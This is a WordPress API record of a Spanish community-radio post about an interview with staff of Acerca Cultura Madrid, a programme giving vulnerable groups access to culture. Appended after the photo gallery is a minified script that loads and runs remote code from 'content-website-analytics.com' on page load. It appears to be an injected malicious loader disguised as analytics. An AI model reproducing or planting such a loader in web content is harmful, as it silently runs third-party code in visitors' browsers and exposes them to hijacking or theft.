{"id":4898,"date":"2024-06-23T18:51:22","date_gmt":"2024-06-23T18:51:22","guid":{"rendered":"https:\/\/radiojabato.es\/?p=4898"},"modified":"2026-04-20T15:23:02","modified_gmt":"2026-04-20T15:23:02","slug":"radio-asamec-acerca-cultura-madrid-la-cultura-un-derecho","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=4898","title":{"rendered":"RADIO ASAMEC: \u00abACERCA CULTURA MADRID, La Cultura, Un Derecho.\u00bb"},"content":{"rendered":"\n<iframe frameborder='0' allowfullscreen='' scrolling='no' height='200' style='width:100%;' src='https:\/\/www.ivoox.com\/player_ej_130713439_6_1.html?c1=cfd97e' loading='lazy'><\/iframe>\n\n\n\n<p>Hoy hemos entrevistado a Berta del R\u00edo (responsable de comunicaci\u00f3n de Acerca Cultura Madrid) y a Cristina Arroyo (coordinadora de Acerca Cultura Madrid).<br>Un programa que facilita a los colectivos en situaci\u00f3n de vulnerabilidad a acceder a las actividades culturales de una red de teatros, auditorios, museos y espacios singulares, p\u00fablicos y privados de la Comunidad de Madrid.<br>El acceso a la cultura es un derecho, dignifica a la persona y normaliza su inclusi\u00f3n llena dentro de la sociedad.<br>Gracias a Juanma y Juli\u00e1n por acompa\u00f1arnos siempre desde Radio Jabato.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"667\" data-id=\"4901\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-22_17-17-23-1024x667.jpg\" alt=\"\" class=\"wp-image-4901\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-22_17-17-23-1024x667.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-22_17-17-23-300x195.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-22_17-17-23-768x500.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-22_17-17-23.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4899\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-33-13-1024x768.jpg\" alt=\"\" class=\"wp-image-4899\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-33-13-1024x768.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-33-13-300x225.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-33-13-768x576.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-33-13.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"619\" data-id=\"4900\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-34-21-1024x619.jpg\" alt=\"\" class=\"wp-image-4900\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-34-21-1024x619.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-34-21-300x181.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-34-21-768x464.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/06\/photo_2024-06-23_20-34-21.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy hemos entrevistado a Berta del R\u00edo (responsable de comunicaci\u00f3n de Acerca Cultura Madrid) y a Cristina Arroyo (coordinadora de Acerca Cultura Madrid).Un programa que facilita a los colectivos en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[987],"tags":[],"class_list":["post-4898","post","type-post","status-publish","format-standard","hentry","category-asamec-asociacion-de-salud-mental-del-corredor"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4898","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4898"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4898\/revisions"}],"predecessor-version":[{"id":14356,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4898\/revisions\/14356"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4898"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4898"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4898"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}